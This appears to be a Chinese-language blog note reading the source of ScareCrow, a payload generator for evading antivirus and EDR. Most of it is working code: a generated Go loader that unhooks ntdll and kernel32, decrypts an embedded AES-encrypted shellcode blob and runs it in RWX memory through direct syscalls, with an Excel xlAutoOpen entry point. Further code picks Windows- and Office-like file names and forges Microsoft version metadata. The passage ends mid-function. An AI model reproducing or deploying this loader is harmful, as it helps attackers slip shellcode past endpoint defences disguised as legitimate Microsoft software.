- https://github.com/Veil-Framework/Veil-Ordnance/blob/master/encoders/xor.py
ScareCrow源码阅读
ScareCrow作者的思想是加载dll原始文件中的text段,覆盖原先的用来去除钩子,然后使用syscall方法加载shellcode,其中又设计了一些可以依赖白服务的方式,包括控制面板,用JScript loader加载excel,msiexec,wscript。为了像真的,ScareCrow有一个版本库,会生成一些白服务的版本信息,同时也会自签名。
在kali里面使用,生成一个默认exe ./ScareCrow -I ../calc_x64.bin -domain baidu.com
在本地win10上打开失败了,在虚拟机win7上也失败了
杀毒报告
- https://s.threatbook.cn/report/file/a9e1e42f86939b4dced3a54bcdbc36d6f99119168c2525630e8218b5d0bcd376/?env=win7_sp1_enx64_office2013
- https://www.virustotal.com/gui/file/a9e1e42f86939b4dced3a54bcdbc36d6f99119168c2525630e8218b5d0bcd376/detection
它里面loader有好几种
[*] binary - Generates a binary based payload. (This type does not benefit from any sideloading)
[*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified. A JScript loader will be generated.
[*] dll - Generates just a DLL file. Can be executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
[*] excel - Loads into a hidden Excel process using a JScript loader.
[*] msiexec - Loads into MSIexec process using a JScript loader.
[*] wscript - Loads into WScript process using a JScript loader.
(default "binary")
因为是在kali里面运行,msiexec,wscript生成都不成功 它生成的代码
package main
import "C"
import (
"crypto/aes"
"crypto/cipher"
"debug/pe"
"encoding/base64"
"encoding/hex"
"loader/loader"
"os"
"io/ioutil"
"strconv"
"syscall"
"unsafe"
"golang.org/x/sys/windows"
"golang.org/x/sys/windows/registry"
)
var (
QTNgbdJ uint16
xPJtTukTggE uint16
)
func VylJFEkgR(WhjD []byte) []byte {
ZbWM := len(WhjD)
YyTwbW := int(WhjD[ZbWM-1])
return WhjD[:(ZbWM - YyTwbW )]
}
func jqKvzXFk() string {
OWNAR, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE)
xrwfel, _, _ := OWNAR.GetStringValue("CurrentVersion")
kHCaikI, _, err := OWNAR.GetIntegerValue("CurrentMajorVersionNumber")
if err == nil{
bHBHKpig, _, _ := OWNAR.GetIntegerValue("CurrentMinorVersionNumber")
xrwfel = strconv.FormatUint(kHCaikI, 10) + "." + strconv.FormatUint(bHBHKpig, 10)
}
defer OWNAR.Close()
if xrwfel == "10.0" {
QTNgbdJ = 0x18
xPJtTukTggE = 0x50
} else if xrwfel == "6.3" {
QTNgbdJ = 0x17
xPJtTukTggE = 0x4f
} else if xrwfel == "6.2" {
QTNgbdJ = 0x16
xPJtTukTggE = 0x4e
} else if xrwfel == "6.1" {
QTNgbdJ = 0x15
xPJtTukTggE= 0x4d
}
return xrwfel
}
func urSQbwP() {
err := ODDiu("C:\\Windows\\System32\\kernel32.dll")
if err != nil {
}
err = ODDiu("C:\\Windows\\System32\\kernelbase.dll")
if err != nil {
}
err = ODDiu("C:\\Windows\\System32\\ntdll.dll")
if err != nil {
}
}
func main() {
}
//export xlAutoOpen
func xlAutoOpen() {
Start()
}
//export Start
func Start() {
xrwfel := jqKvzXFk()
if xrwfel == "10.0" {
urSQbwP()
}
eowXYy, _ := base64.StdEncoding.DecodeString("1TbFs72Nck5oMoHH5nR2gSfU9Yd6dvcAXH7b29Za8lJOoBKRGPglcroigeb35AbxJ7DthqboHr0eBuZ8hKPqG/lwFspzY0vfIZsT3Zbz7Hz3rObkL7orTbrGR6Vk/czevUqK5Gso5rgmtZGkgGOJ0Lr/NyMTN4sOpUjjl5hIwjTeMdjwIElmdHpFwLIqMdyNY+h8GKAy4FQL38gIx7aZe8v7dHCg4VQp0Irp+lR/GD7wfjQRH2dUoDpc3eZjKnLP9g9SX1jUwhFWuutikvNkyQZlg3ClROqHVDJVS3RCF9LIx+MDzoQytKkxZ/3KJ/9/clqkO/+TMiGljDaiaeQpRCEg1dKsc+he4mSCsKjDA7mgWpfUkWvHW7aAhlUMi0rXepNhEKeYg60IBtIEN8odmvmOx3P2Ca2OsKAzpiO4Z7BLo5/SPe7bOLeBpn7HJZcMoR2EJC1N16MJWPcC0xIMxbFeBNdqNTS55+3v7/j+YbhnwbL701CcbszWbAVLiFIYEPxQpmNTOLZUWNkuFSC+S6FYLmju3V6IKtpdxJy5D9i6pvN23hFeWKtsb+CRSd+XeNIK6LsdoUbGf0t1Jnq7j014OqtRDQOlWZj4Kp2GOjRAwLShSGzrTXtZrz5uWHeoydOpH0feUS1/oVfbkdn+odIG1V3ycEY8EB0bUwaI8Ecxw1L89jc57iPH/OA4SnXFtlujQKMkSTxCqjMUaElk/zBXeJktpd4c/PlUmS72MP2F0kVTnokPrYNCvOVzqmHrIdBpFFUrFPY4BdxT6qwEm1nwclbZG8hJ+uvwqehm5lbf//9EgSfpxTwoVI/8XgveJiTSESdSwJf7ZFcXISRkgRt/WPGf/9ohGvp4MgijanpQEQyWR8ONpdyj1CJKXrdBYrOhqMI7Dk+b1MRrK6Tc+4NrYYV8OmMEm0XMYy7RLG/D8zFxQAYBqkyHo2Cme12nVKge4oLUkt1U7DW+3jIitNubHjFafl4iSCLrq2MMkPw=")
zlbOVAro, _ := base64.StdEncoding.DecodeString("s+pun6IZu7pD4hNVseITTbHneqaKrW3Iy/+6pWp0Jsc=")
nyJBI, _ := base64.StdEncoding.DecodeString("ps+IenKBF96RquCWJC7KZQ==")
ceXUIZsjVdQ, err := aes.NewCipher(zlbOVAro)
if err != nil {
return
}
if len(eowXYy) < aes.BlockSize {
return
}
ejsDBvjep := make([]byte, len(eowXYy))
KyKSX := cipher.NewCBCDecrypter(ceXUIZsjVdQ, nyJBI)
KyKSX.CryptBlocks(ejsDBvjep, eowXYy)
VDHrcqkMwKR := VylJFEkgR(ejsDBvjep)
KNmnWh := (string(VDHrcqkMwKR))
mQwDPce, _ := base64.StdEncoding.DecodeString(KNmnWh)
lkcytR, _ := hex.DecodeString(string(mQwDPce))
os.Stdout, _ = os.Open(os.DevNull)
var tnhVVDGIgZc uint64
var pCXyNRMdBh, LmEpft, IAvxNZLjEws, MCRUcjJkNxa uintptr
tnhVVDGIgZc = 0xffffffffffffffff
qRhafbY := len(lkcytR)
IZVU := uintptr(qRhafbY)
MCRUcjJkNxa = 0x40
IAvxNZLjEws = 0x3000
kFWe := loader.Allocate(QTNgbdJ, tnhVVDGIgZc, pCXyNRMdBh, LmEpft, IZVU, IAvxNZLjEws, MCRUcjJkNxa, 0)
dmFqlBSEYYK := (*[1890000]byte)(unsafe.Pointer(kFWe))
for x, y := range []byte(lkcytR) {
dmFqlBSEYYK [x] = y
}
syscall.Syscall(kFWe, 0, 0, 0, 0)
}
func ODDiu(name string) error {
aLHoeYf, oDQcUYT := ioutil.ReadFile(name)
if oDQcUYT != nil {
return oDQcUYT
}
uFMo, oDQcUYT := pe.Open(name)
if oDQcUYT != nil {
return oDQcUYT
}
LxeJITykhv := uFMo.Section(".text")
aOiexJp := aLHoeYf[LxeJITykhv.Offset:LxeJITykhv.Size]
qEwAhhnvd, oDQcUYT := windows.LoadDLL(name)
if oDQcUYT != nil {
return oDQcUYT
}
ScggEeagR := qEwAhhnvd.Handle
FcAoOoNcUOV := uintptr(ScggEeagR)
pCXrNjOZ := uint(FcAoOoNcUOV) + uint(LxeJITykhv.VirtualAddress)
var ULXJVTH uintptr
IZVU := uintptr(len(aOiexJp))
zeLTU := uintptr(0xffffffffffffffff)
YdDQBRb, _ := NtProtectVirtualMemory(
xPJtTukTggE,
zeLTU,
(*uintptr)(unsafe.Pointer(&pCXrNjOZ)),
&IZVU,
syscall.PAGE_EXECUTE_READWRITE,
&ULXJVTH,
)
if YdDQBRb != 0 {
panic("Call to VirtualProtect failed!")
}
for i := 0; i < len(aOiexJp); i++ {
lKNuddb := uintptr(pCXrNjOZ + uint(i))
hoFQtZdbB := (*[1]byte)(unsafe.Pointer(lKNuddb))
(*hoFQtZdbB)[0] = aOiexJp[i]
}
YdDQBRb, _ = NtProtectVirtualMemory(
xPJtTukTggE,
zeLTU,
(*uintptr)(unsafe.Pointer(&pCXrNjOZ)),
&IZVU,
ULXJVTH,
&ULXJVTH,
)
if YdDQBRb != 0 {
panic("Call to VirtualProtect failed!!")
}
return nil
}
func NtProtectVirtualMemory(CjSf uint16, ZJFqa uintptr, TEFMkLIY, iJrZAdKtu *uintptr, GlPvHGO uintptr, PVAYyo *uintptr) (uint32, error) {
return loader.NtProtectVirtualMemory(
CjSf,
ZJFqa,
uintptr(unsafe.Pointer(TEFMkLIY)),
uintptr(unsafe.Pointer(iJrZAdKtu)),
GlPvHGO,
uintptr(unsafe.Pointer(PVAYyo)),
)
}
汇编代码
TEXT ·Allocate(SB),$0-56
XORQ AX,AX
MOVW callid+0(FP), AX
MOVQ PHandle+8(FP), CX
MOVQ SP, DX
ADDQ $0x48, DX
MOVQ $0,(DX)
MOVQ ZeroBits+35(FP), R8
MOVQ SP, R9
ADDQ $40, R9
ADDQ $8,SP
MOVQ CX,R10
SYSCALL
SUBQ $8,SP
RET
//Shout out to C-Sto for helping me solve the issue of ... alot of this also based on https://golang.org/src/runtime/sys_windows_amd64.s
#define maxargs 8
//func Syscall(callid uint16, argh ...uintptr) (uint32, error)
TEXT ·NtProtectVirtualMemory(SB), $0-56
XORQ AX,AX
MOVW callid+0(FP), AX
PUSHQ CX
MOVQ argh_len+16(FP),CX
MOVQ argh_base+8(FP),SI
MOVQ 0x30(GS), DI
MOVL $0, 0x68(DI)
SUBQ $(maxargs*8), SP
MOVQ SP, DI
CLD
REP; MOVSQ
MOVQ SP, SI
SUBQ $8, SP
MOVQ 0(SI), CX
MOVQ 8(SI), DX
MOVQ 16(SI), R8
MOVQ 24(SI), R9
MOVQ CX, X0
MOVQ DX, X1
MOVQ R8, X2
MOVQ R9, X3
MOVQ CX, R10
SYSCALL
ADDQ $((maxargs+1)*8), SP
POPQ CX
MOVL AX, errcode+32(FP)
MOVQ 0x30(GS), DI
MOVL 0x68(DI), AX
MOVQ AX, err_itable+40(FP)
RET
获取随机文件名(白名单)
func FileName(mode string) (string, string) {
var filename string
var name string
wscript := []string{"APMon", "bisrv", "btpanui", "certcli", "cmdext", "httpapi", "libcrypto", "netlogon", "tcpmon"}
dllname := []string{"apphelp", "bcryptprimitives", "cfgmgr32", "combase", "cryptsp", "dpapi", "sechost", "schannel", "urlmon", "win32u"}
cplname := []string{"appwizard", "bthprop", "desktop", "netfirewall", "FlashPlayer", "hardwarewiz", "inetcontrol", "control", "irprop", "game", "inputs", "mimosys", "ncp", "power", "speech", "system", "Tablet", "telephone", "datetime", "winsec"}
officename := []string{"Timesheet", "Reports", "Zoom", "Updates", "Calculator", "Calendar", "Memo", "Desk", "Appwiz"}
Binaryname := []string{"Excel", "Word", "Outlook", "Powerpnt", "lync", "cmd", "OneDrive", "OneNote"}
if mode == "excel" {
name = officename[Cryptor.GenerateNumer(0, 9)]
filename = name + ".xll"
}
if mode == "control" {
name = cplname[Cryptor.GenerateNumer(0, 20)]
filename = name + ".cpl"
}
if mode == "wscript" {
name = wscript[Cryptor.GenerateNumer(0, 10)]
filename = name + ".dll"
}
if mode == "dll" {
name = dllname[Cryptor.GenerateNumer(0, 9)]
filename = name + ".dll"
}
if mode == "msiexec" {
name = dllname[Cryptor.GenerateNumer(0, 9)]
filename = name + ".dll"
}
if mode == "binary" {
name = Binaryname[Cryptor.GenerateNumer(0, 8)]
filename = name + ".exe"
}
return name, filename
}
文件属性生成
import "github.com/josephspurrier/goversioninfo"
func FileProperties(name string, configFile string) string {
fmt.Println("[*] Creating an Embedded Resource File")
vi := &goversioninfo.VersionInfo{}
if configFile != "" {
var err error
input := io.ReadCloser(os.Stdin)
if input, err = os.Open("../" + configFile); err != nil {
log.Printf("Cannot open %q: %v", configFile, err)
os.Exit(3)
}
jsonBytes, err := ioutil.ReadAll(input)
input.Close()
if err != nil {
log.Printf("Error reading %q: %v", configFile, err)
os.Exit(3)
}
if err := vi.ParseJSON(jsonBytes); err != nil {
log.Printf("Could not parse the .json file: %v", err)
os.Exit(3)
}
name = vi.StringFileInfo.InternalName
} else if configFile == "" {
if name == "APMon" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "APMon.dll.mui"
vi.StringFileInfo.FileDescription = "Adaptive Port Monitor"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\APMon.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "APMon.dll.mui"
}
if name == "bisr" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "bisrv.dll.mui"
vi.StringFileInfo.FileDescription = "Background Tasks Infrastructure Service"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\bisrv.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "bisrv.dll.mui"
}
if name == "btpanui" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "btpanui.dll.mui"
vi.StringFileInfo.FileDescription = "Bluetooth PAN User Interface"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\btpanui.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "btpanui.dll.mui"
}
if name == "cmdext" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "CmdExt.DLL"
vi.StringFileInfo.FileDescription = "cmd.exe Extension DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmdext.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "CmdExt.DLL"
}
if name == "httpapi" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "httpapi.dll.mui"
vi.StringFileInfo.FileDescription = "HTTP Protocol Stack API"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\httpapi.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "httpapi.dll.mui"
}
if name == "logoncli" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "LOGONCLI.DLL"
vi.StringFileInfo.FileDescription = "Net Logon Client DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.1237 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\logoncli.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1237"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1237
vi.StringFileInfo.InternalName = "LOGONCLI.DLL"
}
if name == "netlogon" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI"
vi.StringFileInfo.FileDescription = "Net Logon Services DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\netlogon.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "NetLogon.DLL.MUI"
}
if name == "tcpmon" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "tcpmon.dll.mui"
vi.StringFileInfo.FileDescription = "Standard TCP/IP Port Monitor DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\tcpmon.dll"
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Corporation"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 1
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.InternalName = "tcpmon.dll.mui"
}
if name == "OneNote" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "OneNote"
vi.StringFileInfo.FileDescription = "Microsoft OneNote"
vi.StringFileInfo.FileVersion = "16.0.13901.20462"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\ONENOTE.EXE"
vi.FixedFileInfo.ProductVersion.Patch = 13901
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.13901.20462"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 13901
vi.FixedFileInfo.FileVersion.Build = 20462
vi.StringFileInfo.InternalName = "OneNote"
}
if name == "Excel" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Excel"
vi.StringFileInfo.FileDescription = "Microsoft Excel"
vi.StringFileInfo.FileVersion = "16.0.11929.20838"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\EXCEL.EXE"
vi.FixedFileInfo.ProductVersion.Patch = 11929
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 11929
vi.FixedFileInfo.FileVersion.Build = 20838
vi.StringFileInfo.InternalName = "Excel"
}
if name == "Word" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Word"
vi.StringFileInfo.FileDescription = "Microsoft Word"
vi.StringFileInfo.FileVersion = "16.0.11929.20838"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\WORD.EXE"
vi.FixedFileInfo.ProductVersion.Patch = 11929
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 11929
vi.FixedFileInfo.FileVersion.Build = 20838
vi.StringFileInfo.InternalName = "Word"
}
if name == "Powerpnt" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "POWERPNT"
vi.StringFileInfo.FileDescription = "Microsoft PowerPoint"
vi.StringFileInfo.FileVersion = "16.0.11929.20838"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\POWERPNT.EXE"
vi.FixedFileInfo.ProductVersion.Patch = 11929
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 11929
vi.FixedFileInfo.FileVersion.Build = 20838
vi.StringFileInfo.InternalName = "POWERPNT"
}
if name == "Outlook" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Outlook.exe"
vi.StringFileInfo.FileDescription = "Microsoft Outlook"
vi.StringFileInfo.FileVersion = "16.0.11929.20838"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE"
vi.FixedFileInfo.ProductVersion.Patch = 11929
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 11929
vi.FixedFileInfo.FileVersion.Build = 20838
vi.StringFileInfo.InternalName = "Outlook"
}
if name == "lync" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Lync"
vi.StringFileInfo.FileDescription = "Skype for Business"
vi.StringFileInfo.FileVersion = "16.0.11929.20838"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Program Files\\Microsoft Office\\root\\Office16\\lync.exe"
vi.FixedFileInfo.ProductVersion.Patch = 11929
vi.FixedFileInfo.ProductVersion.Major = 16
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft Office"
vi.StringFileInfo.ProductVersion = "16.0.11929.20838"
vi.FixedFileInfo.FileVersion.Major = 16
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 11929
vi.FixedFileInfo.FileVersion.Build = 20838
vi.StringFileInfo.InternalName = "Lync"
}
if name == "cmd" {
vi.StringFileInfo.InternalName = "cmd"
vi.StringFileInfo.FileDescription = "Windows Command Processor"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "C:\\Windows\\System32\\cmd.exe"
vi.FixedFileInfo.ProductVersion.Patch = 1
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 1
vi.FixedFileInfo.FileVersion.Build = 18362
vi.StringFileInfo.InternalName = "cmd.exe"
}
if name == "OneDrive" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "OneDrive.exe"
vi.StringFileInfo.FileDescription = "Microsoft OneDrive"
vi.StringFileInfo.FileVersion = "20.114.0607.0002"
vi.StringFileInfo.LegalCopyright = "©¿½ Microsoft Corporation. All rights reserved."
vi.StringFileInfo.OriginalFilename = "OneDrive.exe"
vi.FixedFileInfo.ProductVersion.Patch = 2
vi.FixedFileInfo.ProductVersion.Major = 20
vi.FixedFileInfo.ProductVersion.Minor = 114
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "20.114.0607.0002"
vi.FixedFileInfo.FileVersion.Major = 20
vi.FixedFileInfo.FileVersion.Minor = 114
vi.FixedFileInfo.FileVersion.Patch = 2
vi.FixedFileInfo.FileVersion.Build = 607
vi.StringFileInfo.InternalName = "OneDrive.exe"
}
if name == "apphelp" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "Apphelp"
vi.StringFileInfo.FileDescription = "Application Compatibility Client Library"
vi.StringFileInfo.FileVersion = "10.0.18362.1 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.1"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 1
vi.StringFileInfo.OriginalFilename = "Apphelp.dll"
}
if name == "bcryptprimitives" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "bcryptprimitives.dll"
vi.StringFileInfo.FileDescription = "Windows Cryptographic Primitives Library"
vi.StringFileInfo.FileVersion = "10.0.18362.836 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
vi.FixedFileInfo.ProductVersion.Major = 10
vi.FixedFileInfo.ProductVersion.Minor = 0
vi.StringFileInfo.ProductName = "Microsoft® Windows® Operating System"
vi.StringFileInfo.ProductVersion = "10.0.18362.836"
vi.FixedFileInfo.FileVersion.Major = 10
vi.FixedFileInfo.FileVersion.Minor = 0
vi.FixedFileInfo.FileVersion.Patch = 18362
vi.FixedFileInfo.FileVersion.Build = 836
vi.StringFileInfo.OriginalFilename = "bcryptprimitives.dll"
}
if name == "cfgmgr32" {
vi.StringFileInfo.CompanyName = "Microsoft Corporation"
vi.StringFileInfo.InternalName = "cfgmgr32.dll"
vi.StringFileInfo.FileDescription = "Configuration Manager DLL"
vi.StringFileInfo.FileVersion = "10.0.18362.387 (WinBuild.160101.0800)"
vi.StringFileInfo.LegalCopyright = "© Microsoft Corporation. All rights reserved."
vi.StringFileInfo.LegalTrademarks = ""
vi.FixedFileInfo.ProductVersion.Patch = 18362
